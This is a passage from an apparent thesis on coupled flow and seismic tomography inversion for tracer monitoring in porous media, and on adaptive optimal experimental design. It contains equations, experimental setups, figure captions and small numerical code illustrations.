To summarize, Equation (4.16) is solved for the derivative of $m$ with respect to $u$ and substituted into Equation (4.15) to obtain the derivative of the residual function $r(u)$ as

\[ J(u) = \frac{\partial r(u)}{\partial u} = (I\otimes F)\,A(u)^{-1}\left(\frac{\partial (B(u)m_0)}{\partial u} - \frac{\partial (A(u)m)}{\partial u}\right). \tag{4.17} \]

An important observation needs to be made here. While the matrix $J(u)$ is dense in general, its product with a vector can be computed efficiently using sparse matrix techniques. To calculate $J(u)$ times an arbitrary vector $z$, one first computes the matrix vector product

\[ y = \left(\frac{\partial (B(u)m_0)}{\partial u} - \frac{\partial (A(u)m)}{\partial u}\right) z. \]

Since this matrix is sparse, the computation can be done efficiently. Next, the solution $x = A(u)^{-1}y$ is obtained by solving the linear system

\[ A(u)\,x = y. \]

Solving this linear system is equivalent to solving a single flow forward problem, that is, advection in time. Finally, the matrix $F$ is also sparse, and thus the matrix vector product $(I\otimes F)\,x$ can also be computed quickly and efficiently.

To complete the computation of the derivatives, the differentiation of the regularization term is now discussed. It is straightforward to verify that

\[ \frac{\partial R_{\rm flow}}{\partial u} = \alpha_1\, \mathrm{CURL}^{\top}\mathrm{diag}\big(1/\phi(\mathrm{CURL}\,u)\big)\,\mathrm{CURL}\,u, \tag{4.18} \]

where the notation $1/\phi$ denotes the point-wise division of a vector.

Given all the components described above, the goal is now to solve the discrete optimization problem. There are a number of options for the solution of the problem. Here an approximation to the Sequential Quadratic Programming (SQP) approach is applied.
By linearizing the system in (4.12) and using a Gauss-Newton approximation of the Hessian with respect to $u$, the following linear system is obtained,

\[ \begin{pmatrix} J^{\top}J + \alpha_1\,\mathrm{CURL}^{\top}\mathrm{diag}\big(1/\phi(\mathrm{CURL}\,u)\big)\,\mathrm{CURL} & \mathrm{DIV}^{\top} \\ \mathrm{DIV} & 0 \end{pmatrix} \begin{pmatrix} \delta u \\ \delta\lambda \end{pmatrix} = -\begin{pmatrix} \mathcal L_u \\ \mathcal L_{\lambda} \end{pmatrix}. \tag{4.19} \]

This system is solved for $\delta u$ and $\delta\lambda$, and a soft (backtracking) line search is used for the update of $u$ and $\lambda$ (Nocedal and Wright, 2000).

To solve the linear system (4.19), note that the system has many similarities to the Stokes problem, with a positive semi-definite (1,1) block, as outlined in Golub and Greif (2003). Such systems can be solved by a combination of the augmented Lagrangian method and an approximation to the Schur complement (Benzi et al., 2005).

4.4 Initialization

The optimization problem given by Equation (4.10) is a nonlinear, non-convex problem that, without an appropriate initialization, will result in solutions of low quality. Therefore an initialization methodology is used that cheaply yields a "reasonable" starting point.

To this end, consider the decoupling of the imaging of the slowness for all times. That is, consider the individual problems

\[ F m_k + \epsilon = d_k, \qquad k = 1,\dots,n. \]

Inverting each data set to obtain $n$ initial estimates of $m_k$ is accomplished by solving $n$ decoupled optimization problems,

\[ \hat m_k = \arg\min_{m_k} \tfrac12\|F m_k - d_k\|^2 + R_m(m_k), \qquad k = 1,\dots,n. \tag{4.20} \]

Given the estimates $\hat m_k$, an estimate of the initialization velocity is computed by solving the optimization problem

\[ \hat u = \arg\min_u \tfrac12\|A(u)\,\hat m - B(u)\,\hat m_0\|^2 + R_{\rm flow}(u). \tag{4.21} \]

This estimate is equivalent to obtaining a flow estimate without improving $m$, which in this experiment leads to a good initial guess for both the slowness and the velocity.

In the following sections, the approach to jointly estimating the initial slowness and the velocity field is demonstrated with a small numerical example. The results show that the recovered flow field and the reconstructed initial slowness can be used to predict the flow of an injected tracer within the subsurface.

4.5 Experimental setup

The computational domain, $\Omega = [0,100]\times[0,200]$ meters, is divided into $l = [200, 100]$ cells of width $h = [1, 1]$. The ground truth conductivity model consists of five layers, with conductivities ranging between 10 and 1000 m$^3\cdot$day/kg. The ground truth model is pictured in the top panel of Figure 4.1. Two boreholes are used for the injection and extraction of fluids. A reference conductivity model was constructed by linear interpolation of the borehole data. The reference conductivity model is a simple layer of high conductivity ($k = 1000$ m$^3\cdot$day/kg) surrounded by a background layer ($k = 10$ m$^3\cdot$day/kg). Both the true and reference conductivity models are pictured in Figure 4.1. The ground-truth initial tracer $m_{\rm gt}$ is a piece-wise constant model with two regions of concentration 0.5 and 1; see the top left plot in Figure 4.2. Fluid is injected from the left well at 50 m depth and extracted from the right well at 60 m depth, with a static pumping rate of $\pm 100$ m$^3$/day.

Given the hydraulic conductivity model and the source term, the ground-truth flow field $u_{\rm gt}$ and the reference flow field $u_{\rm ref}$ are obtained by solving Equation (2.3); see the quiver plot in Figure 4.1. Tomography travel-time data are simulated by solving the forward problem given by Equation (3.7) for $m_{\rm gt}$ and $u_{\rm ref}$, and adding Gaussian white noise with a standard deviation $\sigma = 0.5$. The tomography experiment consists of $n_s = n_r = 35$ transmitters and receivers, equally spaced from 20 m to 100 m depth along the left and right boundaries of the domain, respectively.
Data were simulated for 15 days with a time step $\Delta t = 1$ day. Snapshots of the advection of the tracer can be seen in the first column of Figure 4.3.

4.6 Sequential reconstruction as initialization

To obtain a starting guess for the flow field and the initial slowness $m_0$, the procedure outlined in Section 4.4 is applied. First, the slowness evolution is individually reconstructed for all 15 days, solving Equation (4.20) using a standard Gauss-Newton method with a regularization parameter $\beta = 0.4$. Subsequently, a flow estimate $\hat u$ was obtained by solving Equation (4.21) using the described SQP method with regularization parameters $\alpha_1 = 10^3$ and $\alpha_2 = 4\cdot 10^3$. The regularization parameters were found using a cooling strategy, which starts with large parameters that are decreased iteratively until the measurement noise becomes visually too prominent in both the reconstructed images and the estimated flow fields.

Figure 4.1: Visualizations of the ground truth and reference hydraulic conductivity models and the associated flow fields (hydraulic conductivity in m$^3\cdot$day/kg). The true and reference models are discretized on a $100\times200$ cell grid on a domain of 100 m depth by 200 m across. A static source, at 55 m depth on the left border, and a sink, at 65 m depth on the right border of the domain, are indicated in red. The reference model is a simplified model which interpolates borehole data between the two wells.

Figure 4.2: Visualization of the ground truth (first column), the individual reconstruction (second column), and the results of the joint reconstruction approach (third column), for the domain with dimensions 100 m (y direction, depth) by 200 m (x direction, across). The first row visualizes the initial slowness ($m_0$). The second shows a quiver plot of the recovered velocity field ($\vec u$). The components of the velocity field $[u_x, u_y]$ are pictured in the third and fourth rows, and the last row shows the curl of the velocity field ($\nabla\times\vec u$). Note that there is almost no flow in the y direction, and that at the boundaries of the reservoir there are non-zero values of the curl of $\vec u$.

Figure 4.3: The evolution of the tracer (rows: days 1, 10, 15, 25, and 35), pictured for the ground-truth (left column), the individual reconstruction used for initialization (middle column), and the proposed joint reconstruction (right column). The tracer evolution is simulated for 40 days with the respective initial slowness and flow field. The front of the ground truth tracer is visualized by dashed lines for the first 3 rows. Note that the joint method results match the ground truth tracer front to a greater degree than the predictions from the initialization estimates.

A larger bias towards the reference flow field, $u_{\rm ref}$, is given close to the boreholes by using the weighting function $w(x_1, x_2) = (x_2 - 100)^2/100^2$.

Estimates of the initial slowness and flow field are visualized in the second column of Figure 4.2. The first row shows the reconstruction of the initial slowness, estimated by inverting the tomography data of the first day. The flow field estimate, visualized in the second, third, fourth, and fifth rows (as a quiver plot, component-wise, and by its curl), captures the main characteristics of the ground truth.
However, the magnitude of the velocity field is small compared to the ground truth. This can be seen in the plots of $u_y$, and in the second column of Figure 4.3, where the front of the high concentration plume lags behind the ground truth. This demonstrates the importance of using the flow to better guide the imaging, which in turn yields more accurate flow predictions.

4.7 Joint reconstruction

To improve the estimates of $m_0$ and the velocity field, the coupled tracer tomography inverse problem (Equation (4.1a)) is solved. The regularization parameters were adjusted to $\alpha_1 = 5\times10^3$, $\alpha_2 = 7\times10^4$ and $\beta = 200$. The result of the individual estimate of $\hat u$ was used as a starting guess for the optimization, and $u_{\rm ref}$ for the reference model.

Since errors in the flow field accumulate in time, an outer loop is used to introduce the tomography data sequentially as the reconstruction of the velocity field improves. To be precise, only the tomography data from the first day are used in the estimation problem for $m_0$, and then the flow field is estimated by solving Equation (4.12) using the SQP method outlined earlier. Afterwards, the estimate $m_0$ is updated by introducing tomography data from one additional day, and the estimate of $u$ is updated. In total, five outer iterations are performed, using tomography data from the first six days. Note that all tomography data are used in the flow estimation at all iterations. It is important to note that the computational time increases with the coupled recovery method, since it requires solving the system (4.19) in addition to the imaging step.

The initial slowness and velocity field reconstruction results are visualized in the third column of Figure 4.2. Note the significant improvement in the reconstruction of $m_0$, particularly the sharpening of the edges.

4.8 Forecasting

The numerically estimated flow fields and initial slowness are used to forecast the evolution of the tracer beyond the first 15 days, by solving the forward flow model in Equation (2.9) for 35 days. The numerical solutions of the initialization and the joint history matching problems are compared to the ground-truth in Figure 4.3.

In the considered application, the most interesting quantity is the prediction of the arrival time. The front of the tracer is thus visualized by a dashed line in the subplots. It can be seen that the coupled estimate of $u$ and $m$ improves the prediction of the arrival time when compared with the estimates obtained in the initialization.

4.9 Summary

This chapter presented a new method for the estimation and prediction of tracer flow in porous media given seismic tomography geophysical data. The new coupled method was formulated as a flow constrained inverse problem to estimate both the initial seismic slowness and the velocity field in which the tracer is injected. As a consequence of the coupled ill-posed inverse problem, a novel regularization for the velocity field was additionally constructed to promote discontinuities at rock property interfaces. The coupled method was demonstrated for the model borehole seismic tomography survey of tracer advection.
4.9 Summary

This chapter presented a new method for the estimation and prediction of tracer flow in porous media given seismic tomography geophysical data. The new coupled method was formulated as a flow-constrained inverse problem to estimate both the initial seismic slowness and the velocity field in which the tracer is injected. As a consequence of the coupled ill-posed inverse problem, a novel regularization for the velocity field was additionally constructed to promote discontinuities at rock property interfaces. The coupled method was demonstrated for the model borehole seismic tomography survey of tracer advection. The numerical results were compared with numerical results obtained through a decoupled process and demonstrate that this new coupled approach yields not only accurate reconstructions of the initial slowness and flow field but, especially, accurate predictions of the fluid flow velocity and tracer evolution.

In addition to coupling the flow and geophysics, the next approach to improving reservoir monitoring is to consider what data are collected as the tracer moves through the subsurface. This optimal experiment design question is investigated in the following chapter.

Chapter 5 Dynamic optimal experimental design

The previous chapter presented a new joint method for estimating the initial slowness m_0 and the velocity field u, given all previous seismic tomography data sets, for the reservoir monitoring experiment outlined in Chapter 2. Although this method alleviates some of the uncertainty and expense involved in reservoir monitoring programs by making use of geophysical data instead of sparse fluid measurements, it is possible that the tomography data set could be reduced while maintaining an optimal estimation of the initial slowness. In this chapter, the idea is therefore to reduce the number of necessary tomography data measurements in an optimal way. This is commonly known as optimal experimental design.

The optimal design method will generate an experiment with a reduced number of measurements while maintaining the best estimate of the initial slowness, incorporate the historic tomography data sets, and couple the flow dynamics such that the experimental design adapts with the moving tracer. For the formulation of the design method, the assumption is made that the dynamics are well known; that is, it is assumed that u is known, or estimated to reasonable accuracy for forecasting.

The new approach, defined as adaptive optimal experimental design, applies a method similar to classic A-optimal design criteria by minimizing the adapted mean square error (amse) of a regularized model estimate, instead of the mean square error (Atkinson and Donev, 1992; Fedorov, 1972). The adapted mean square error is defined by introducing a monitor function which scales the mean squared error according to historic model estimates.

This chapter introduces the adaptive design method from first principles, describes the numerical optimization of the resulting design objective function, and discusses the results for the tomography tracer advection reservoir model example.

5.1 Adaptive experimental design

To introduce the adaptive experimental design method it is necessary to understand A-optimal design criteria from first principles. To begin, consider only two measurement vectors of the form

F_1 m + ε_1 = d_1  and  F_2 m + ε_2 = d_2,   (5.1)

where F_1 is the forward tomography operator at time t_1 and F_2 is the forward operator at time t_2. As before, the measurement error vectors ε_k are assumed to be normally distributed uncorrelated noise, ε_k ∼ N(0, W_k^{-1}), with zero mean and a diagonal covariance matrix W_k^{-1}, for k = 1, 2.

At this point consider only the static case, where the goal is to design the experiments at times t_1 and t_2 such that the "best" recovery of m is obtained by some criterion, such as minimizing the Tikhonov optimization problem. This scenario fits the problem where the dynamical system is "exact" (containing no noise, as in Section 3.2.1) and m represents the dynamical system parameters, such as the initial condition of the tracer in the reservoir modeling experiment. Two different designs can be considered.
First, it is possible to perform a-priori design, that is, to design the experiments F_1 and F_2 prior to the data collection. This is the case when the time between t_1 and t_2 is much shorter than the time for the processing of the data. A second approach is to use post-priori design. The idea here is to use the results obtained from the first experiment in order to design a "better" second experiment. The goal is to first obtain an a-priori design for the first experiment and then, after the data is collected and processed, use the estimator obtained at t_1 in order to design the data collection at time t_2.

Before discussing the design of the data acquisition for time t_2, it is necessary to review the a-priori design of the experiment at time t_1. Consider the regularized estimation of m given d_1, accomplished by solving the following penalized weighted least squares (Tikhonov regularized) optimization problem

m̂_1 = argmin_m (1/2)‖F_1 m − d_1‖²_{W_1} + (α/2)‖L(m − m̂_0)‖²_2,   (5.2)

where W_1 = diag(w_1) is a matrix of inverse variances, that is, the inverse covariance of the noise, L is a smoothing penalty matrix, m̂_0 is the current estimate of the model prior to having data, and α is a regularization parameter. Recall from Chapter 3 that, from the Bayesian perspective, m̂_0 can be considered the mean of a prior probability distribution with covariance matrix (L^T L)^{-1}. Minimizing Equation (5.2) yields the estimator

m̂_1 = (F_1^T W_1 F_1 + α L^T L)^{-1} (F_1^T W_1 d_1 + α L^T L m̂_0).   (5.3)

Defining the matrix C = F_1^T W_1 F_1 + α L^T L, and recalling that F_1 m + ε_1 = d_1, the error in the recovery can be written as

m̂_1 − m = C^{-1} F_1^T W_1 F_1 m + C^{-1} F_1^T W_1 ε_1 + α C^{-1} L^T L m̂_0 + (α C^{-1} L^T L m − α C^{-1} L^T L m) − m.   (5.4)

Collecting terms and using the definition of C gives

m̂_1 − m = C^{-1} F_1^T W_1 ε_1 + α C^{-1} L^T L (m̂_0 − m).   (5.5)

Squaring and taking the expectation over ε_1, and recalling that ε_1 ∼ N(0, W_1^{-1}), the mean square error is then given by

mse(w_1, m) = E‖m̂_1 − m‖²_2 = trace[F_1 C^{-2} F_1^T W_1] + α² E‖C^{-1} L^T L (m̂_0 − m)‖²_2.   (5.6)

Taking the Bayesian point of view assumes that m − m̂_0 is Gaussian with zero mean and covariance matrix (α L^T L)^{-1}, such that the mean squared error is equivalent to the Bayesian risk,

mse(w_1) = φ_1(w_1) = trace[C^{-2} F_1^T W_1 F_1] + α trace[C^{-2} L^T L].   (5.7)

Finally, using the linearity of the trace and the definition of C results in

φ_1(w_1) = trace[(F_1^T W_1 F_1 + α L^T L)^{-1}].   (5.8)

That is, the Bayesian risk is the trace of the inverse precision matrix, or trace of the posterior covariance matrix; a well known result.
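For concreteness, the estimator (5.3) and the A-optimal criterion (5.8) can be evaluated directly on a small dense toy problem. All sizes and operators below are arbitrary illustrative choices, not values from the thesis:

```python
import numpy as np

# Toy evaluation of the Tikhonov estimator (5.3) and the Bayesian risk (5.8).
rng = np.random.default_rng(0)
n, n_data, alpha = 20, 30, 0.1
F1 = rng.standard_normal((n_data, n))       # forward tomography operator
L = np.eye(n)                               # smoothing/smallness penalty
w1 = np.ones(n_data)                        # inverse data variances
W1 = np.diag(w1)

C = F1.T @ W1 @ F1 + alpha * L.T @ L        # precision matrix C
m_true = rng.standard_normal(n)
d1 = F1 @ m_true + rng.standard_normal(n_data) / np.sqrt(w1)  # noisy data
m0_hat = np.zeros(n)                        # prior mean
m1_hat = np.linalg.solve(C, F1.T @ W1 @ d1 + alpha * L.T @ L @ m0_hat)  # (5.3)

risk = np.trace(np.linalg.inv(C))           # (5.8): A-optimal design criterion
```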
The goal of the design problem is to obtain a better estimate for m by assuming that the (inverse) variances, w_1, of the collected data can be controlled in some way. By controlled, it is assumed that a data measurement is accompanied by a standard deviation determined by the instrumentation. If this is not the case, several measurements at a particular location can be conducted to estimate the error. Similar treatment is given in (Alexanderian et al., 2014; Haber et al., 2008, 2010, 2011), where this point is further discussed. In this way, through optimization, the weights w_i are estimated prior to the actual data collection, and a measurement d_i that is assigned an infinite standard deviation (w_i = 0, that is, zero inverse variance) by the optimization is thus not collected.

To estimate the variances, the Bayesian risk φ_1(w_1) is minimized with respect to w. Additionally, since the goal is to obtain a sparse design (that is, to collect only a few measurements), an additional cost on w_1 is added. This cost is equivalent to the 1-norm of w and promotes its sparsity (see (Alexanderian et al., 2014; Haber et al., 2008) for further discussion), resulting in the following optimization problem, which balances the minimization of the mean squared error (mse) and the cost of the experiment (Haber et al., 2008),

φ^β_1(w_1) = trace[(F_1^T W_1 F_1 + α L^T L)^{-1}] + β e^T w_1,  0 ≤ w_{1,i},   (5.9)

where e is a vector of ones.

Consider now the design problem of estimating m given the estimated model m̂_1. One could rewrite the recovery problem in a similar way, that is,

m̂_2 = argmin_m (1/2)‖F_1 m − d_1‖²_{W_1} + (1/2)‖F_2 m − d_2‖²_{W_2} + (α/2)‖L(m − m̂_0)‖²_2,   (5.10)

which leads to the estimate

m̂_2(w_2) = (F_1^T W_1 F_1 + F_2^T W_2 F_2 + α L^T L)^{-1} (F_1^T W_1 d_1 + F_2^T W_2 d_2 + α L^T L m̂_0).   (5.11)

Note that w_1 is assumed to be fixed and therefore the new estimate is a function of w_2 alone. If the steps above are repeated, then the A-optimal design for time t_2 yields the minimization of the function

φ^β_2(w_2) = trace[(F_1^T W_1 F_1 + F_2^T W_2 F_2 + α L^T L)^{-1}] + β e^T w_2,  0 ≤ w_{2,i}.   (5.12)

At this point it is worth pausing for a moment and noting an important feature of the experimental design criteria: the design criteria do not depend on the data. This observation is true for any of the design criteria (that is, C, D, and E designs) (Fedorov, 1972). Furthermore, it is easy to verify that any linear estimator of the data yields a covariance matrix that is independent of d_1. This implies that using current design criteria does not make use of the estimated model obtained at time t_1 to obtain a better estimate at time t_2. In order to use the information obtained at time t_1 for the design of the experiment at time t_2, the concept of adaptive design is presented.

Assume that the model m̂_1 has some "interesting" features and some "boring" features. To be more specific, assume that the difference

δ_1 = |m̂_1 − m̂_0|   (5.13)

is small in some norm over a region and large in others. The goal then is to better estimate the new features that appear in the model. To this end, the monitor function ψ(δ) is introduced to measure the change in the model. For example, to start, consider the function

ψ = δ,   (5.14)

which simply measures the change in the estimator compared to the previously known estimator. A different function that was found to be useful in numerical experiments is

ψ = χ_θ(δ),   (5.15)

where χ_θ is a smoothed characteristic function. In this case the optimization focuses only on areas where δ is large and does not sample areas where δ is small.

Given the monitor function, rather than minimizing the mean square error, the idea is to minimize the adaptive mean square error (amse), defined by

amse(w_2, m) = E‖m̂_2 − m‖²_{ψ_1} = E[(m̂_2 − m)^T diag(ψ_1)(m̂_2 − m)].   (5.16)

The idea behind the amse is to obtain a tighter bound on the model where the estimator exhibits large changes compared to the known a-priori estimator. Starting from Equation (5.4), modifying it to deal with the amse, and repeating the calculation above, the expectation of the amse is

φ_2(w_2) = trace[diag(ψ_1)(F_1^T W_1 F_1 + F_2^T W_2 F_2 + α L^T L)^{-1}].   (5.17)

Similar to the non-adaptive case, the adaptive design is computed by minimizing the (penalized) function φ_2(w_2).
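A possible smoothed characteristic function for (5.15), and the resulting monitored trace of (5.17), might look as follows. The threshold, smoothing width, and toy posterior covariance are illustrative assumptions only:

```python
import numpy as np

def smoothed_characteristic(delta, theta, width=0.05):
    """chi_theta(delta): close to 1 where |delta| > theta, close to 0 elsewhere."""
    return 0.5 * (1.0 + np.tanh((np.abs(delta) - theta) / width))

rng = np.random.default_rng(1)
m1_hat = rng.standard_normal(20)            # estimate at t1 (toy values)
m0_hat = rng.standard_normal(20)            # prior estimate
delta = np.abs(m1_hat - m0_hat)             # change, Eq. (5.13)
psi = smoothed_characteristic(delta, theta=0.5)   # monitor, Eq. (5.15)

A = rng.standard_normal((20, 20))
post_cov = np.linalg.inv(A @ A.T + np.eye(20))    # toy posterior covariance
amse = np.trace(np.diag(psi) @ post_cov)          # monitored trace, cf. (5.17)
```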
The above concept can easily be extended to any number of time steps. Consider k − 1 experiments that are conducted at times t_1, …, t_{k−1} using the forward operators F_1, …, F_{k−1}, and assume that the goal is to design an experiment for the problem at time t_k. The design criterion in this case reads

φ^β_k(w_k) = trace[diag(ψ_{k−1})(Σ_{j=1}^{k} F_j^T W_j F_j + α L^T L)^{-1}] + β e^T w_k,  0 ≤ w_{k,i},   (5.18)

where ψ_{k−1} is the monitor function that measures the difference between the model estimated at time t_{k−1} and the model estimated at time t_{k−2}.

5.2 Design for dynamical systems

The previous section presented a formulation for adaptive A-optimal experimental design that assumes the model m is static. This section therefore addresses the case where the model is governed by a (potentially noisy) dynamical system. Recalling Chapter 3 and the system of Equations (3.1), the adaptive optimal design method is applied for both cases, where the dynamic tracer advection model is assumed to be exact or inexact. Note that in these cases the velocity field u is assumed to be known.

5.2.1 Exact dynamics

Considering the data vector given by Equation (3.6) in Chapter 3, and noting that this case is exactly the case described in the previous section, the amse criterion can be directly applied. Given the assumption that there is no error, the estimation of the initial model m_0 given k data sets is

m̂_{0,k} = argmin_{m_0} (1/2)Σ_{j=1}^{k} ‖F_j m_0 − d_j‖²_{W_j} + (α/2)‖L(m_0 − m̂_0)‖²_2,   (5.19)

and therefore the design function is identical to Equation (5.18),

φ^β_k(w_k) = trace[diag(ψ_{k−1})(Σ_{j=1}^{k} F_j^T W_j F_j + α L^T L)^{-1}] + β e^T w_k,  0 ≤ w_{k,i}.   (5.20)

5.2.2 Inexact dynamics

To address the case where the dynamics are inexact, recall Equations (3.11) and (3.12), which correspond to the noise vectors for the tomography imaging experiment and the tracer dynamics model. In order to apply the amse method, the problem is formulated as in Kalman smoothing (Aravkin et al., 2013; Kalman, 1960). A similar approach that maximizes the information gain was presented in (Gharamti et al., 2015) for the ensemble Kalman filter.

Recalling that the noise vector η_k ∼ N(0, Q_k), and assuming that all Q_k are known, that is, that the dynamics are not changing in time, all models m̂_k = (m̂_0^T, …, m̂_k^T)^T are estimated by minimizing Equation (3.13) presented in Section 3.2.2,

m̂_k = argmin (1/2)‖(I ⊗ F) m_k − d_k‖²_{W_k} + (1/2)‖T m_k‖²_{Q_k^{-1}} + (α/2)‖(I ⊗ L) m_k‖²_2,

such that

m̂_k = ((I ⊗ F)^T W_k (I ⊗ F) + T^T Q_k^{-1} T + α I ⊗ L^T L)^{-1} (I ⊗ F)^T W_k d_k,   (5.21)

where W_k = diag(w_0, …, w_k) and Q_k^{-1} = blkdiag(Q_1^{-1}, …, Q_k^{-1}).

It is assumed in this case that the first experiment, d_0, will either be conducted such that all data are collected, or will be conducted in a naive way. In either case it is assumed that the initial experimental design, W_0 = diag(w_0), is known or can be designed for, as was suggested in previous work (Haber et al., 2011).

In a straightforward extension of the previous section, the amse design optimization function for a design at time t_k is then

Φ^β_k(w_k) = trace[diag(ψ̄_k)((I ⊗ F)^T W_k (I ⊗ F) + T^T Q_k^{-1} T + α I ⊗ (L^T L))^{-1}] + β e^T w_k,  0 ≤ w_{k,i},   (5.22)

where ψ̄_k = (ψ_0(m̂_0), …, ψ_k(T m̂_{k−1})).

It is assumed here that all previous experiments 0, …, k − 1 have already been conducted. Therefore, solutions are only for the current time point t_k. At this point, m̂_k is not known. To predict m̂_k at time t_k, the previous estimator is propagated ahead in time, m̂_k ≈ T m̂_{k−1}.

The two formulations of the adaptive design method for a dynamical system yield two different numerical optimization problems. However, in the limit that all Q_k → 0, the inexact optimization problem reduces to the exact formulation; see (Nocedal and Wright, 2000) for a discussion of penalty methods.
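The stacked matrix appearing in (5.21)-(5.22) can be assembled with Kronecker products. The sketch below only illustrates the block structure, with toy sizes, unit data weights, and an identity stand-in for the one-step transport matrix; it is not the thesis discretization:

```python
import numpy as np
from scipy.sparse import eye, kron

rng = np.random.default_rng(2)
n, nt, n_data, alpha, sigma = 10, 3, 15, 0.1, 0.2
F = rng.standard_normal((n_data, n))            # single-survey forward operator
Fk = kron(eye(nt + 1), F)                       # I (x) F over nt+1 time points
Wk = eye((nt + 1) * n_data)                     # unit inverse variances (toy)
LtL = eye(n)                                    # L'L for the smallness penalty
A = eye(n)                                      # toy one-step transport matrix
# T stacks the dynamics residuals m_{j+1} - A m_j for j = 0..nt-1.
T = kron(eye(nt, nt + 1, k=1), eye(n)) - kron(eye(nt, nt + 1), A)
H = Fk.T @ Wk @ Fk + T.T @ T / sigma**2 + alpha * kron(eye(nt + 1), LtL)
```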
The numerical optimization techniques for the solution of these problems are discussed in the following section.

5.3 Numerical optimization

This section presents the calculation of the gradients required to solve the design optimization problems for both the exact and inexact tracer dynamics.

5.3.1 Exact dynamics

Finding an optimal design for time step k requires the minimization of the objective functional given by Equation (5.20), which involves computing the trace of a large dense matrix. Typically, when solving geophysical problems, the size of the matrices can be on the order of millions. Thus, forming and storing these matrices is memory- and compute-intensive.

In the non-linear optimization algorithm, the computation of the objective function and its gradient is required at each iteration. In order to avoid numerous expensive calculations while storing and manipulating large dense matrices, a stochastic Hutchinson trace estimator is applied to approximate the trace (Haber et al., 2011; Hutchinson, 1990). By doing so, the objective function reduces to matrix-vector products, which can be carried out much more efficiently.

If the vectors v_1, …, v_m are independent, each with independent entries taking the values 1 and −1 with equal probability, then the stochastic trace estimator of the trace of a matrix H is given by

trace(H) ≈ (1/m) Σ_{i=1}^{m} v_i^T H v_i.

Applying the trace estimator with m = 1, Equation (5.20) becomes

φ^β_k(w_k) = v^T diag(ψ)(F_k^T W_k F_k + G)^{-1} v + β e^T w_k,   (5.23)

where e is a vector of ones, G = Σ_{j=1}^{k−1} F_j^T W_j F_j + α L^T L, and v is a random vector with equally distributed values of 1 and −1.

Note that computing the gradient of φ^β_k(w_k) involves computing the gradient of an inverse matrix. This computation is carried out by defining z such that

z = (F_k^T W_k F_k + G)^{-1} v  ⇔  (F_k^T W_k F_k + G) z = v,   (5.24)

recalling that W_k = diag(w_k), and differentiating implicitly to obtain

F_k^T diag(F_k z) + (F_k^T diag(w_k) F_k + G) J = 0.   (5.25)

Solving for the Jacobian J = dz/dw_k results in

J = −(F_k^T diag(w_k) F_k + G)^{-1} F_k^T diag(F_k z).   (5.26)

Substituting J back into ∇φ^β_k, transposing, and defining the matrix C = F_k^T W_k F_k + G and the vectors y and z by

C z = v  and  C y = ψ ⊙ v,

yields the gradient of the design function,

∇φ^β_k(w_k) = −(F_k z) ⊙ (F_k y) + β e,   (5.27)

where ⊙ is the Hadamard product.

Unfortunately, due to the inclusion of the monitor function ψ, the computation of the gradient is slightly more complicated compared with the classic A-optimal design case. Here the optimization requires solutions to two linear systems, Cz = v and Cy = ψ ⊙ v, compared with a single linear system for the classic A design. However, since only matrix-vector products are required, the conjugate gradient method is used to solve these systems, avoiding ever forming C explicitly.

Due to the non-linearity of the design problem, iterative solution methods are required. Here, a gradient descent method with a backtracking line search is used to solve for w_k.
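In code, the Hutchinson-estimated objective (5.23) and gradient (5.27) reduce to two conjugate-gradient solves. The sketch below uses a small dense toy operator and SciPy's matrix-free CG; all sizes, the monitor values, and the weights are illustrative assumptions, not thesis settings:

```python
import numpy as np
from scipy.sparse.linalg import LinearOperator, cg

rng = np.random.default_rng(3)
n, n_rays, alpha, beta = 30, 50, 0.1, 1e-3
Fk = rng.standard_normal((n_rays, n))     # current forward operator F_k
psi = rng.random(n)                       # monitor function values
w = np.ones(n_rays)                       # current design weights w_k
G = alpha * np.eye(n)                     # historic term + regularization (toy)

def apply_C(x):                           # matrix-free C x = (F' diag(w) F + G) x
    return Fk.T @ (w * (Fk @ x)) + G @ x

C = LinearOperator((n, n), matvec=apply_C)
v = rng.choice([-1.0, 1.0], size=n)       # Hutchinson probe vector
z, _ = cg(C, v)                           # solve C z = v
y, _ = cg(C, psi * v)                     # solve C y = psi (Hadamard) v
objective = v @ (psi * z) + beta * w.sum()                 # Eq. (5.23)
gradient = -(Fk @ z) * (Fk @ y) + beta * np.ones(n_rays)   # Eq. (5.27)
```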
5.3.2 Inexact dynamics

To minimize the noisy design function Φ^β_k(w_k), the Hutchinson trace estimator is again used to approximate the trace operation in Equation (5.22),

Φ^β_k(w_k) = v^T diag(ψ̄_k)((I ⊗ F)^T W_k (I ⊗ F) + T^T Q_k^{-1} T + α I ⊗ (L^T L))^{-1} v,   (5.28)

where ψ̄ = (ψ_0, ψ_1, …, ψ_k)^T and v is a (k + 1)N × 1 vector of evenly distributed values of −1 and 1. As in the noiseless case, note again that the computation of the gradient of Φ^β_k involves the computation of the gradient of a large dense inverse matrix. Therefore, the vector z = (z_0, …, z_k)^T is defined such that

((I ⊗ F)^T W_k (I ⊗ F) + T^T Q_k^{-1} T + α I ⊗ (L^T L)) z = v.   (5.29)

Differentiating with respect to w_k and solving for J = dz/dw_k results in

J = −((I ⊗ F)^T W_k (I ⊗ F) + T^T Q_k^{-1} T + α I ⊗ (L^T L))^{-1} B,   (5.30)

where

B = (0, …, 0, F^T diag(F z_k))^T.   (5.31)

Substituting J back into the gradient of the design objective function and transposing gives

∇Φ^β_k(w_k) = −B^T y + β e,   (5.32)

where

y = ((I ⊗ F)^T W_k (I ⊗ F) + T^T Q_k^{-1} T + α I ⊗ (L^T L))^{-T} (ψ̄ ⊙ v).   (5.33)

To solve for z and y, the preconditioned conjugate gradient method was used to avoid forming the large matrices. The steepest descent method was used for the non-linear design optimization.

5.4 Numerical examples

The adaptive design method is demonstrated for the reservoir monitoring simulation using the tomography experiment and tracer advection. The survey was designed to fully demonstrate the ability of the method to track motion and areas of interest in the model. The example consists of a circular volume of tracer moving vertically. The dynamics governing the motion of the tracer are described by the tracer advection model and imaged using the borehole seismic tomography survey.

The partial differential equations governing both the seismic tomography experiment (Equation (2.1)) and the tracer dynamics (Equation (2.3)) are discretized on a 2D computational domain Ω = [0, 400] × [0, 100] m, divided into [100, 50] cells of width h = [4, 2] m. The fluid velocity field u was computed by solving Equations (2.3b) and (2.3c) with a constant hydraulic conductivity of 10 m^3 day/kg and a pumping rate of 150 m^3/s.

Figure 5.1: Initial experiment setup. Tomography sources are pictured in green on the left and receivers in blue on the right. The initial setup covers the entire flow domain with 20 sources and 30 receivers. There is one source of fluid, pumped at a constant rate from the top green point, and a sink at the bottom (red) of the domain. Flow is in the downward direction.

5.4.1 Regularization

